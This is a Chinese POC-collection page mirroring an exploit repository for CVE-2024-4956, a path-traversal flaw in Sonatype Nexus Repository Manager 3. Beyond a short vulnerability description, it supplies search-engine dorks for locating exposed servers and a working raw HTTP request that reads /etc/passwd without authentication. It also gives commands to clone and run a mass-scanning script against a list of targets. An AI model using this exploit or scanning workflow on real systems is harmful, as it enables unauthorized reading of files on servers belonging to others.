POC详情: df7cc66d2fa0978fdf1dbb8ad6dbab52c411ea7e

来源
关联漏洞
标题: Sonatype Nexus Repository 安全漏洞 (CVE-2024-4956)
描述:Sonatype Nexus Repository是美国Sonatype公司的一款存储库管理器,它主要用于管理、存储和分发软件等。 Sonatype Nexus Repository 3.68.1之前版本存在安全漏洞,该漏洞源于存在路径遍历,允许未经身份验证的攻击者读取系统文件。
描述
CVE-2024-4956 : Nexus Repository Manager 3 poc exploit
介绍
# # CVE-2024-4956 : Nexus Repository Manager 3

Dork:

- Shodan:http.html:"Nexus Repository"
  
- Hunter:product.name="Nexus Repository"
  
- FOFA:app="Nexus-Repository-Manager"

Poc :

```
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
```


![1](https://github.com/GoatSecurity/CVE-2024-4956/assets/153397256/610e851b-2c77-4aa1-9fd2-bd8ffcfae264)

  

Or you can use this python script for multi scan :

!Put your targets in targets.txt

```
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py
```
![Screenshot](https://github.com/GoatSecurity/CVE-2024-4956/assets/153397256/3b939643-a388-4fe3-8922-4c49b6236b84)

文件快照

[4.0K] /data/pocs/df7cc66d2fa0978fdf1dbb8ad6dbab52c411ea7e ├── [1003] README.md ├── [ 18] requirements.txt ├── [1.8K] scan.py └── [ 1] targets.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。